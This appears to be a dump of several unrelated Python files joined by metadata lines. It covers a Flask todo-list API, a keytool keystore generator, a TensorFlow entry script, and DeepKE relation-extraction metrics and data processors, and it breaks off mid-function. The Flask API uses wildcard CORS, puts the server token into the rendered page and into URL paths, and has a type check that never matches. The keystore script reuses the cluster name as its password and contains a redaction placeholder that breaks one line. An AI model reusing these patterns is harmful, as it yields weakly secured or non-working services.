app = Flask(__name__)
app.testing = True
app.url_map.strict_slashes = False
cors = CORS(app, resources={r"/api/*": {"origins": "*"}})
ERRORS = [
"Not a JSON", "Missing required information",
"No tasks saved yet, please save a todo task",
"Wrong id type", "Missing required user information",
"not an authenticated request"
]
def api_response(state, message, code):
"""
Method to handle errors with api
"""
time = str(datetime.utcnow())[11:19]
data = "{} {}".format(message, time)
response = {state: data, "status_code": code}
resp_json = jsonify(response)
return resp_json
@app.teardown_appcontext
def teardown_db(exception):
"""
after each request, this method calls .close() (i.e. .remove()) on
the current SQLAlchemy Session
"""
storage.close()
@app.route('/', methods=['GET'])
def main_index():
"""
handles request to main index.html
"""
if request.method == 'GET':
cache_id = uuid4()
token = User.text_encrypt(API_BEARER_TOKEN)
return render_template('index.html', token=token, cache_id=cache_id)
def make_todo_list(verified_user):
"""
makes JSON todo list for client
"""
todo_list = {}
todo_list['userInfo'] = verified_user.to_json()
all_tasks = todo_list['userInfo'].pop('tasks')
return all_tasks
@app.route('/api/<fbid>/<token>', methods=['GET'])
def api_get_handler(fbid=None, token=None):
"""
handles api get requests
"""
if fbid is None or token is None:
return api_response("error", ERRORS[2], 401)
verified_user = storage.get_user_by_fbid(fbid)
if verified_user is None:
return api_response("error", ERRORS[2], 401)
try:
encrypted_token = User.text_decrypt(token)
except Exception as e:
return api_response("error", str(e), 401)
if encrypted_token != API_BEARER_TOKEN:
return api_response("error", ERRORS[5], 401)
all_tasks = make_todo_list(verified_user)
return jsonify(all_tasks), 201
def initialize_new_task_list(user_info, all_tasks):
"""
initializes new task and user from POST request
"""
new_user = User(**user_info)
new_user.save()
user_id = new_user.id
for task in all_tasks.values():
task['user_id'] = user_id
new_task = Task(**task)
new_task.save()
return "new user and tasks created"
def update_user_tasks(verified_user, all_tasks):
"""
updates user task information
"""
user_id = verified_user.id
db_user_tasks = verified_user.tasks
db_user_task_ids = set([task.id for task in db_user_tasks])
for task_id, task in all_tasks.items():
if task_id in db_user_task_ids:
db_user_task_ids.remove(task_id)
task_to_update = storage.get("Task", task_id)
key = "{}.{}".format("Task", task_id)
value = task_to_update.get(key)
value.bm_update(task)
else:
task['user_id'] = user_id
new_task = Task(**task)
new_task.save()
if len(db_user_task_ids) > 0:
for task_id in db_user_task_ids:
task_to_delete = storage.get("Task", task_id)
key = "{}.{}".format("Task", task_id)
value = task_to_delete.get(key)
value.delete()
return "tasks updated"
def verify_proper_post_request(req_data):
"""
verifies that proper request has been made
"""
if req_data is None:
return 0
user_info = req_data.get('userInfo', None)
if user_info is None:
return 1
token = req_data.get('token')
if token is None:
return 5
try:
encrypted_token = User.text_decrypt(token)
except Exception as e:
return 5
if encrypted_token != API_BEARER_TOKEN:
return 5
fbid = user_info.get('fbid', None)
if fbid is None:
return 2
if type(fbid) == 'int':
return 3
for attr in REQUIRED:
if attr not in user_info:
return 4
return fbid
@app.route('/api', methods=['POST'])
def api_post_handler():
"""
handles api post requests
"""
req_data = request.get_json()
verification = verify_proper_post_request(req_data)
if type(verification).__name__ == "int":
return api_response("error", ERRORS[verification], 400)
user_info = req_data.get('userInfo', None)
all_tasks = req_data.get('allTasks', None)
if user_info is None or all_tasks is None:
return api_response("error", ERRORS[1], 400)
for req in REQUIRED:
if req not in user_info:
return api_response("error", ERRORS[1], 400)
verified_user = storage.get_user_by_fbid(verification)
if verified_user is None:
message = initialize_new_task_list(user_info, all_tasks)
return api_response("success", message, 200)
else:
message = update_user_tasks(verified_user, all_tasks)
return api_response("success", message, 200)
@app.errorhandler(404)
def page_not_found(error):
"""
404 page error handler
"""
cache_id = uuid4()
return render_template('404.html', cache_id=cache_id), 404
if __name__ == "__main__":
"""
MAIN Flask App
"""
app.run(host=APP_HOST, port=APP_PORT)
``` |
{
"source": "john-coleman/planb-cassandra",
"score": 2
} |
#### File: john-coleman/planb-cassandra/create_truststore.py
```python
import tempfile
import os
import base64
from subprocess import check_call, call
def generate_certificate(cluster_name: str):
check = call(["which", "keytool"])
if check:
print("Keytool is not in searchpath")
return
d = tempfile.mkdtemp()
try:
keystore = os.path.join(d, 'keystore')
cmd = ["keytool", "-genkeypair",
"-alias", "planb",
"-keyalg", "RSA",
"-validity", "36000",
"-keystore", keystore,
"-dname", "c=DE, st=Berlin, l=Berlin, o=Zalando SE, cn=zalando.net",
"-storepass", <PASSWORD>_name,
"-keypass", cluster_name]
check_call(cmd)
cert = os.path.join(d, 'cert')
export = ["keytool", "-export",
"-alias", "planb",
"-keystore", keystore,
"-rfc",
"-file", cert,
"-storepass", cluster_name]
check_call(export)
truststore = os.path.join(d, 'truststore')
importcmd = ["keytool", "-import",
"-noprompt",
"-alias", "planb",
"-file", cert,
"-keystore", truststore,
"-storepass", cluster_name]
check_call(importcmd)
with open(keystore, 'rb') as fd:
keystore_data = fd.read()
with open(truststore, 'rb') as fd:
truststore_data = fd.read()
finally:
pass
return keystore_data, truststore_data
if __name__ == '__main__':
keystore, truststore = generate_certificate("test-cluster")
with open("test_keystore.base64", "wb") as fd:
fd.write(base64.b64encode(keystore))
with open("test_truststore.base64", "wb") as fd:
fd.write(base64.b64encode(truststore))
``` |
{
"source": "johncolezhang/CV-Project",
"score": 2
} |
#### File: CV-Project/project/main.py
```python
import tensorflow as tf
import sys
sys.path.insert(0, './')
from Model import *
flags = tf.app.flags
#configuration
flags.DEFINE_string("train_dir", "models", "trained model save path")
flags.DEFINE_string("samples_dir", "samples", "sampled images save path")
flags.DEFINE_string("imgs_list_path", "../models/train.txt", "images list file path")
flags.DEFINE_boolean("use_gpu", False, "whether to use gpu for training")
flags.DEFINE_integer("device_id", 0, "gpu device id")
flags.DEFINE_integer("num_epoch", 30, "train epoch num")
flags.DEFINE_integer("batch_size", 32, "batch_size")
flags.DEFINE_float("learning_rate", 4e-4, "learning rate")
conf = flags.FLAGS
def main(_):
model = Model()
model.train()
model.predict()
if __name__ == '__main__':
tf.app.run()
``` |
{
"source": "johncolezhang/DeepKE",
"score": 2
} |
#### File: few_shot/module/metrics.py
```python
import numpy as np
class Seq2SeqSpanMetric(object):
def __init__(self, eos_token_id, num_labels, target_type='word'):
self.eos_token_id = eos_token_id
self.num_labels = num_labels
self.word_start_index = num_labels+2
self.fp = 0
self.tp = 0
self.fn = 0
self.em = 0
self.total = 0
self.target_type = target_type
def evaluate(self, target_span, pred, tgt_tokens):
self.total += pred.size(0)
pred_eos_index = pred.flip(dims=[1]).eq(self.eos_token_id).cumsum(dim=1).long()
target_eos_index = tgt_tokens.flip(dims=[1]).eq(self.eos_token_id).cumsum(dim=1).long()
pred = pred[:, 1:]
tgt_tokens = tgt_tokens[:, 1:]
pred_seq_len = pred_eos_index.flip(dims=[1]).eq(pred_eos_index[:, -1:]).sum(dim=1) # bsz
pred_seq_len = (pred_seq_len - 2).tolist()
target_seq_len = target_eos_index.flip(dims=[1]).eq(target_eos_index[:, -1:]).sum(dim=1) # bsz
target_seq_len = (target_seq_len-2).tolist()
pred_spans = []
for i, (ts, ps) in enumerate(zip(target_span, pred.tolist())):
em = 0
ps = ps[:pred_seq_len[i]]
if pred_seq_len[i]==target_seq_len[i]:
em = int(tgt_tokens[i, :target_seq_len[i]].eq(pred[i, :target_seq_len[i]]).sum().item()==target_seq_len[i])
self.em += em
pairs = []
cur_pair = []
if len(ps):
for j in ps:
if j<self.word_start_index:
if self.target_type == 'span':
if len(cur_pair)>0 and len(cur_pair)%2==0:
if all([cur_pair[i]<=cur_pair[i+1] for i in range(len(cur_pair)-1)]):
pairs.append(tuple(cur_pair+[j]))
else:
if len(cur_pair) > 0:
if all([cur_pair[i]<cur_pair[i+1] for i in range(len(cur_pair)-1)]):
pairs.append(tuple(cur_pair + [j]))
cur_pair = []
else:
cur_pair.append(j)
pred_spans.append(pairs.copy())
tp, fn, fp = _compute_tp_fn_fp(pairs, ts)
self.fn += fn
self.tp += tp
self.fp += fp
def get_metric(self, reset=True):
res = {}
f, pre, rec = _compute_f_pre_rec(1, self.tp, self.fn, self.fp)
res['f'] = round(f, 4)*100
res['rec'] = round(rec, 4)*100
res['pre'] = round(pre, 4)*100
res['em'] = round(self.em/self.total, 4)
if reset:
self.total = 0
self.fp = 0
self.tp = 0
self.fn = 0
self.em = 0
return res
def _compute_f_pre_rec(beta_square, tp, fn, fp):
r"""
:param tp: int, true positive
:param fn: int, false negative
:param fp: int, false positive
:return: (f, pre, rec)
"""
pre = tp / (fp + tp + 1e-13)
rec = tp / (fn + tp + 1e-13)
f = (1 + beta_square) * pre * rec / (beta_square * pre + rec + 1e-13)
return f, pre, rec
def _compute_tp_fn_fp(ps, ts):
ps = ps.copy()
tp = 0
fp = 0
fn = 0
if isinstance(ts, (set, list, np.ndarray)):
ts = {tuple(key):1 for key in list(ts)}
if isinstance(ps, (set, list, np.ndarray)):
ps = {tuple(key):1 for key in list(ps)}
for key in ts.keys():
t_num = ts[key]
if key not in ps:
p_num = 0
else:
p_num = ps[key]
tp += min(p_num, t_num)
fp += max(p_num - t_num, 0)
fn += max(t_num - p_num, 0)
if key in ps:
ps.pop(key)
fp += sum(ps.values())
return tp, fn, fp
```
#### File: few_shot/dataset/processor.py
```python
import csv
import pickle
import os
import logging
from tqdm import tqdm, trange
from torch.utils.data import TensorDataset
import torch.nn.functional as F
import numpy as np
import torch
from collections import OrderedDict
from transformers.utils.dummy_tokenizers_objects import BertTokenizerFast
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
# 这就是包内引用吗
import json
import re
from transformers import AutoTokenizer
keyword_files = ["keyword_train.txt", "keyword_dev.txt", "keyword_test.txt"]
def tokenize(text, tokenizer):
# berts tokenize ways
# tokenize the [unused12345678910]
D = [f"[unused{i}]" for i in range(10)]
textraw = [text]
for delimiter in D:
ntextraw = []
for i in range(len(textraw)):
t = textraw[i].split(delimiter)
for j in range(len(t)):
ntextraw += [t[j]]
if j != len(t)-1:
ntextraw += [delimiter]
textraw = ntextraw
text = []
for t in textraw:
if t in D:
text += [t]
else:
tokens = tokenizer.tokenize(t, add_special_tokens=False)
for tok in tokens:
text += [tok]
for idx, t in enumerate(text):
if idx + 3 < len(text) and t == "[" and text[idx+1] == "[UNK]" and text[idx+2] == "]":
text = text[:idx] + ["[MASK]"] + text[idx+3:]
return text
n_class = 1
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None, text_c=None, entity=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.text_c = text_c
self.label = label
self.entity = entity
class InputExampleSST2(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None, text_c=None, entity=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
class InputFeaturesSST2(object):
"""A single set of features of data."""
def __init__(self, input_ids, attention_mask, token_type_ids, label_id):
self.input_ids = input_ids
self.attention_mask = attention_mask
self.token_type_ids = token_type_ids
self.label_id = label_id
class InputExampleWiki80(object):
"""A single training/test example for span pair classification."""
def __init__(self, guid, sentence, span1, span2, ner1, ner2, label):
self.guid = guid
self.sentence = sentence
self.span1 = span1
self.span2 = span2
self.ner1 = ner1
self.ner2 = ner2
self.label = label
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_mask, segment_ids, label_id, entity=None):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.label_id = label_id
self.entity = entity
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
@classmethod
def _read_tsv(cls, input_file, quotechar=None):
"""Reads a tab separated value file."""
with open(input_file, "r") as f:
reader = csv.reader(f, delimiter="\t", quotechar=quotechar)
lines = []
for line in reader:
lines.append(line)
return lines
class Sst2Processor(DataProcessor):
"""Processor for the SST-2 data set (GLUE version)."""
def __init__(self, data_dir, a):
super().__init__()
self.data_dir = data_dir
def get_example_from_tensor_dict(self, tensor_dict):
"""See base class."""
return InputExample(
tensor_dict["idx"].numpy(),
tensor_dict["sentence"].numpy().decode("utf-8"),
None,
str(tensor_dict["label"].numpy()),
)
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "train.tsv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
def get_labels(self):
"""See base class."""
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training, dev and test sets."""
examples = []
text_index = 0
for (i, line) in enumerate(lines):
if i == 0:
continue
guid = "%s-%s" % (set_type, i)
text_a = line[text_index]
label = line[1]
examples.append(InputExample(guid=guid, text_a=text_a, text_b=None, text_c=None, label=label))
return examples
class relossProcessor(DataProcessor): #bert_s
def __init__(self, data_path="data", use_prompt=False):
def is_speaker(a):
a = a.split()
return len(a) == 2 and a[0] == "speaker" and a[1].isdigit()
# replace the speaker with [unused] token
def rename(d, x, y):
d = d.replace("’","'")
d = d.replace("im","i")
d = d.replace("...",".")
unused = ["[unused1]", "[unused2]"]
a = []
if is_speaker(x):
a += [x]
else:
a += [None]
if x != y and is_speaker(y):
a += [y]
else:
a += [None]
for i in range(len(a)):
if a[i] is None:
continue
d = d.replace(a[i] + ":", unused[i] + " :")
if x == a[i]:
x = unused[i]
if y == a[i]:
y = unused[i]
return d, x, y
self.D = [[], [], []]
for sid in range(3):
# 分成三个数据集
with open(data_path + "/"+["train.json", "dev.json", "test.json"][sid], "r", encoding="utf8") as f:
data = json.load(f)
for i in range(len(data)):
for j in range(len(data[i][1])):
rid = []
for k in range(36):
if k+1 in data[i][1][j]["rid"]:
rid += [1]
else:
rid += [0]
d, h, t = rename(' '.join(data[i][0]).lower(), data[i][1][j]["x"].lower(), data[i][1][j]["y"].lower())
prompt = f"what is the relation between {h} and {t} ? {t} is the [MASK] {h} ."
d = [
prompt + d,
h,
t,
rid,
t
]
self.D[sid] += [d]
logger.info(str(len(self.D[0])) + "," + str(len(self.D[1])) + "," + str(len(self.D[2])))
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[0], "train")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[2], "test")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[1], "dev")
def get_labels(self):
"""See base class."""
return [str(x) for x in range(36)]
def _create_examples(self, data, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, d) in enumerate(data):
guid = "%s-%s" % (set_type, i)
examples.append(InputExample(guid=guid, text_a=data[i][0], text_b=data[i][1], label=data[i][3], text_c=data[i][2], entity=data[i][4]))
return examples
class bertProcessor(DataProcessor): #bert_s
def __init__(self, data_path="data", use_prompt=False):
def is_speaker(a):
a = a.split()
return len(a) == 2 and a[0] == "speaker" and a[1].isdigit()
# replace the speaker with [unused] token
def rename(d, x, y):
d = d.replace("’","'")
d = d.replace("im","i")
d = d.replace("...",".")
unused = ["[unused1]", "[unused2]"]
a = []
if is_speaker(x):
a += [x]
else:
a += [None]
if x != y and is_speaker(y):
a += [y]
else:
a += [None]
for i in range(len(a)):
if a[i] is None:
continue
d = d.replace(a[i] + ":", unused[i] + " :")
if x == a[i]:
x = unused[i]
if y == a[i]:
y = unused[i]
return d, x, y
self.D = [[], [], []]
for sid in range(3):
# 分成三个数据集
with open(data_path + "/"+["train.json", "dev.json", "test.json"][sid], "r", encoding="utf8") as f:
data = json.load(f)
sample_idx = 0
for i in range(len(data)):
for j in range(len(data[i][1])):
rid = []
for k in range(36):
if k+1 in data[i][1][j]["rid"]:
rid += [1]
else:
rid += [0]
d, h, t = rename(' '.join(data[i][0]).lower(), data[i][1][j]["x"].lower(), data[i][1][j]["y"].lower())
if use_prompt:
prompt = f"{h} is the [MASK] {t} ."
else:
prompt = f"what is the relation between {h} and {t} ?"
sample_idx += 1
d = [
prompt + d,
h,
t,
rid,
]
self.D[sid] += [d]
logger.info(str(len(self.D[0])) + "," + str(len(self.D[1])) + "," + str(len(self.D[2])))
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[0], "train")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[2], "test")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[1], "dev")
def get_labels(self):
"""See base class."""
return [str(x) for x in range(36)]
def _create_examples(self, data, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, d) in enumerate(data):
guid = "%s-%s" % (set_type, i)
examples.append(InputExample(guid=guid, text_a=data[i][0], text_b=data[i][1], label=data[i][3], text_c=data[i][2]))
return examples
class ptuneProcessor(DataProcessor): #bert_s
def __init__(self, data_path="data", use_prompt=False, ptune_k=6):
def is_speaker(a):
a = a.split()
return len(a) == 2 and a[0] == "speaker" and a[1].isdigit()
# replace the speaker with [unused] token
def rename(d, x, y):
d = d.replace("’","'")
d = d.replace("im","i")
d = d.replace("...",".")
unused = ["[unused1]", "[unused2]"]
a = []
if is_speaker(x):
a += [x]
else:
a += [None]
if x != y and is_speaker(y):
a += [y]
else:
a += [None]
for i in range(len(a)):
if a[i] is None:
continue
d = d.replace(a[i] + ":", unused[i] + " :")
if x == a[i]:
x = unused[i]
if y == a[i]:
y = unused[i]
return d, x, y
self.D = [[], [], []]
"""
TODO, add new samples, every sample if there is a trigger then mask trigger and replace the origin mask with right token,
if no trigger in the sentence, random mask a word in the sentence and replace the origin mask with the right token.
"""
for sid in range(3):
# 分成三个数据集
with open(data_path + "/"+["train.json", "dev.json", "test.json"][sid], "r", encoding="utf8") as f:
data = json.load(f)
sample_idx = 0
for i in range(len(data)):
for j in range(len(data[i][1])):
rid = []
for k in range(36):
if k+1 in data[i][1][j]["rid"]:
rid += [1]
else:
rid += [0]
d, h, t = rename(' '.join(data[i][0]).lower(), data[i][1][j]["x"].lower(), data[i][1][j]["y"].lower())
unused_word = " ".join([f"[unused{i}]" for i in range(3, ptune_k+3)])
# st 3,4 ; ed 5,6
st = [f"[unused{i}]" for i in range(3,5)]
ed = [f"[unused{i}]" for i in range(5,7)]
# 789 as prompt
prompt = f"[sub] {st[0]} {h} {st[1]} [sub] [unused7] [unused8] [MASK] [unused9] [obj] {ed[0]} {t} {ed[1]} [obj]."
# for temp_i in range(10):
# d = d.replace(f"speaker {temp_i}:", f"[speaker{temp_i}]")
sample_idx += 1
sample = [
prompt + d,
h,
t,
rid,
]
self.D[sid] += [sample]
# multi labels, add more data in the training set
if i == 0:
for idx,trigger in enumerate(data[i][1][j]['t']):
if trigger != "":
label_token = f"[class{data[i][1][j]['rid'][idx]+1}]"
prompt = prompt.replace("[MASK]", label_token)
# first assume the model predict the same output in the trigger, ...
d = d.replace(trigger, "[MASK]", 1)
sample = [
prompt + d,
h,
t,
rid,
]
self.D[sid] += [sample]
logger.info(str(len(self.D[0])) + "," + str(len(self.D[1])) + "," + str(len(self.D[2])))
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[0], "train")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[2], "test")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[1], "dev")
def get_labels(self):
"""See base class."""
return [str(x) for x in range(36)]
def _create_examples(self, data, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, d) in enumerate(data):
guid = "%s-%s" % (set_type, i)
examples.append(InputExample(guid=guid, text_a=data[i][0], text_b=data[i][1], label=data[i][3], text_c=data[i][2]))
return examples
class wiki80Processor(DataProcessor):
"""Processor for the TACRED data set."""
def __init__(self, data_path, use_prompt):
super().__init__()
self.data_dir = data_path
@classmethod
def _read_json(cls, input_file):
data = []
with open(input_file, "r", encoding='utf-8') as reader:
all_lines = reader.readlines()
for line in all_lines:
ins = eval(line)
data.append(ins)
return data
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_json(os.path.join(data_dir, "train.txt")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_json(os.path.join(data_dir, "val.txt")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_json(os.path.join(data_dir, "test.txt")), "test")
def get_labels(self, negative_label="no_relation"):
data_dir = self.data_dir
"""See base class."""
# if 'k-shot' in self.data_dir:
# data_dir = os.path.abspath(os.path.join(self.data_dir, "../.."))
# else:
# data_dir = self.data_dir
with open(os.path.join(data_dir,'rel2id.json'), "r", encoding='utf-8') as reader:
re2id = json.load(reader)
return re2id
def _create_examples(self, dataset, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for example in dataset:
sentence = example['token']
examples.append(InputExampleWiki80(guid=None,
sentence=sentence,
# maybe some bugs here, I don't -1
span1=(example['h']['pos'][0], example['h']['pos'][1]),
span2=(example['t']['pos'][0], example['t']['pos'][1]),
ner1=None,
ner2=None,
label=example['relation']))
return examples
def convert_examples_to_features_for_loss(examples, max_seq_length, tokenizer):
print("#examples", len(examples))
features = []
for (ex_index, example) in enumerate(examples):
tokens_a = tokenize(example.text_a, tokenizer)
tokens_b = tokenize(example.text_b, tokenizer)
tokens_c = tokenize(example.text_c, tokenizer)
# t_tokens = tokenize(example.entity, tokenizer)
t_tokens = tokenizer(example.entity, add_special_tokens=False)["input_ids"]
_truncate_seq_tuple(tokens_a, tokens_b, tokens_c, max_seq_length - 4)
tokens_b = tokens_b + ["[SEP]"] + tokens_c
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
label_id = example.label
len_t = len(t_tokens)
normal_input_ids = input_ids[:]
for idx, input_id in enumerate(input_ids):
if idx + len_t < len(input_ids) and input_ids[idx:idx+len_t] == t_tokens:
# [MASK] id = 103
for j in range(len_t):
input_ids[j+idx] = 103
# append 1 sample with 2 input
features.append(
[InputFeatures(
input_ids=normal_input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_id,
entity = t_tokens
),
InputFeatures(
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_id,
entity = t_tokens
)]
)
print('#features', len(features))
return features
def convert_examples_to_features_normal(examples, max_seq_length, tokenizer):
print("#examples", len(examples))
features = []
for (ex_index, example) in enumerate(examples):
tokens_a = tokenize(example.text_a, tokenizer)
tokens_b = tokenize(example.text_b, tokenizer)
tokens_c = tokenize(example.text_c, tokenizer)
_truncate_seq_tuple(tokens_a, tokens_b, tokens_c, max_seq_length - 4)
tokens_b = tokens_b + ["[SEP]"] + tokens_c
inputs = tokenizer(
example.text_a,
example.text_b + tokenizer.sep_token + example.text_c,
truncation="longest_first",
max_length=max_seq_length,
padding="max_length",
add_special_tokens=True
)
# tokens = []
# segment_ids = []
# tokens.append("[CLS]")
# segment_ids.append(0)
# for token in tokens_a:
# tokens.append(token)
# segment_ids.append(0)
# tokens.append("[SEP]")
# segment_ids.append(0)
# for token in tokens_b:
# tokens.append(token)
# segment_ids.append(1)
# tokens.append("[SEP]")
# segment_ids.append(1)
# input_ids = tokenizer.convert_tokens_to_ids(tokens)
# # The mask has 1 for real tokens and 0 for padding tokens. Only real
# # tokens are attended to.
# input_mask = [1] * len(input_ids)
# # Zero-pad up to the sequence length.
# while len(input_ids) < max_seq_length:
# input_ids.append(0)
# input_mask.append(0)
# segment_ids.append(0)
# assert(inputs['input_ids'] == input_ids), print(inputs['input_ids'])
# assert len(input_ids) == max_seq_length
# assert len(input_mask) == max_seq_length
# assert len(segment_ids) == max_seq_length
label_id = example.label
if ex_index == 0:
logger.info(f"input_text : {tokens_a} {tokens_b} {tokens_c}")
logger.info(f"input_ids : {inputs['input_ids']}")
logger.info(f"token_type_ids : {inputs['token_type_ids']}")
# inputs = {}
# inputs['input_ids'] = input_ids
# inputs['attention_mask'] = input_mask
# inputs['token_type_ids'] = segment_ids
# append 1 sample with 2 input
features.append(
InputFeatures(
input_ids=inputs['input_ids'],
input_mask=inputs['attention_mask'],
segment_ids=inputs['token_type_ids'],
label_id=label_id,
)
)
print('#features', len(features))
return features
def convert_examples_to_features(examples, max_seq_length, tokenizer, args, rel2id):
"""Loads a data file into a list of `InputBatch`s."""
save_file = "data/cached_wiki80.pkl"
mode = "text"
num_tokens = 0
num_fit_examples = 0
num_shown_examples = 0
instances = []
use_bert = "BertTokenizer" in tokenizer.__class__.__name__
use_gpt = "GPT" in tokenizer.__class__.__name__
assert not (use_bert and use_gpt), "model cannot be gpt and bert together"
if False:
with open(file=save_file, mode='rb') as fr:
instances = pickle.load(fr)
print('load preprocessed data from {}.'.format(save_file))
else:
print('loading..')
for (ex_index, example) in enumerate(examples):
"""
the relation between SUBJECT and OBJECT is .
"""
if ex_index % 10000 == 0:
logger.info("Writing example %d of %d" % (ex_index, len(examples)))
tokens = []
SUBJECT_START = "[subject_start]"
SUBJECT_END = "[subject_end]"
OBJECT_START = "[object_start]"
OBJECT_END = "[object_end]"
if mode.startswith("text"):
for i, token in enumerate(example.sentence):
if i == example.span1[0]:
tokens.append(SUBJECT_START)
if i == example.span2[0]:
tokens.append(OBJECT_START)
# for sub_token in tokenizer.tokenize(token):
# tokens.append(sub_token)
if i == example.span1[1]:
tokens.append(SUBJECT_END)
if i == example.span2[1]:
tokens.append(OBJECT_END)
tokens.append(token)
SUBJECT = " ".join(example.sentence[example.span1[0]: example.span1[1]])
OBJECT = " ".join(example.sentence[example.span2[0]: example.span2[1]])
SUBJECT_ids = tokenizer(" "+SUBJECT, add_special_tokens=False)['input_ids']
OBJECT_ids = tokenizer(" "+OBJECT, add_special_tokens=False)['input_ids']
if use_gpt:
if args.CT_CL:
prompt = f"[T1] [T2] [T3] [sub] {OBJECT} [sub] [T4] [obj] {SUBJECT} [obj] [T5] {tokenizer.cls_token}"
else:
prompt = f"The relation between [sub] {SUBJECT} [sub] and [obj] {OBJECT} [obj] is {tokenizer.cls_token} ."
else:
# add prompt [T_n] and entity marker [obj] to enrich the context.
prompt = f"[sub] {SUBJECT} [sub] {tokenizer.mask_token} [obj] {OBJECT} [obj] ."
if ex_index == 0:
input_text = " ".join(tokens)
logger.info(f"input text : {input_text}")
logger.info(f"prompt : {prompt}")
logger.info(f"label : {example.label}")
inputs = tokenizer(
prompt,
" ".join(tokens),
truncation="longest_first",
max_length=max_seq_length,
padding="max_length",
add_special_tokens=True
)
if use_gpt: cls_token_location = inputs['input_ids'].index(tokenizer.cls_token_id)
# find the subject and object tokens, choose the first ones
sub_st = sub_ed = obj_st = obj_ed = -1
for i in range(len(inputs['input_ids'])):
if sub_st == -1 and inputs['input_ids'][i:i+len(SUBJECT_ids)] == SUBJECT_ids:
sub_st = i
sub_ed = i + len(SUBJECT_ids)
if obj_st == -1 and inputs['input_ids'][i:i+len(OBJECT_ids)] == OBJECT_ids:
obj_st = i
obj_ed = i + len(OBJECT_ids)
assert sub_st != -1 and obj_st != -1
num_tokens += sum(inputs['attention_mask'])
if sum(inputs['attention_mask']) > max_seq_length:
pass
# tokens = tokens[:max_seq_length]
else:
num_fit_examples += 1
x = OrderedDict()
x['input_ids'] = inputs['input_ids']
if use_bert: x['token_type_ids'] = inputs['token_type_ids']
x['attention_mask'] = inputs['attention_mask']
x['label'] = rel2id[example.label]
if use_gpt: x['cls_token_location'] = cls_token_location
x['so'] =[sub_st, sub_ed, obj_st, obj_ed]
instances.append(x)
with open(file=save_file, mode='wb') as fw:
pickle.dump(instances, fw)
print('Finish save preprocessed data to {}.'.format( save_file))
input_ids = [o['input_ids'] for o in instances]
attention_mask = [o['attention_mask'] for o in instances]
if use_bert: token_type_ids = [o['token_type_ids'] for o in instances]
if use_gpt: cls_idx = [o['cls_token_location'] for o in instances]
labels = [o['label'] for o in instances]
so = torch.tensor([o['so'] for o in instances])
input_ids = torch.tensor(input_ids)
attention_mask = torch.tensor(attention_mask)
if use_gpt: cls_idx = torch.tensor(cls_idx)
if use_bert: token_type_ids = torch.tensor(token_type_ids)
labels = torch.tensor(labels)
logger.info("Average #tokens: %.2f" % (num_tokens * 1.0 / len(examples)))
logger.info("%d (%.2f %%) examples can fit max_seq_length = %d" % (num_fit_examples,
num_fit_examples * 100.0 / len(examples), max_seq_length))
if use_gpt:
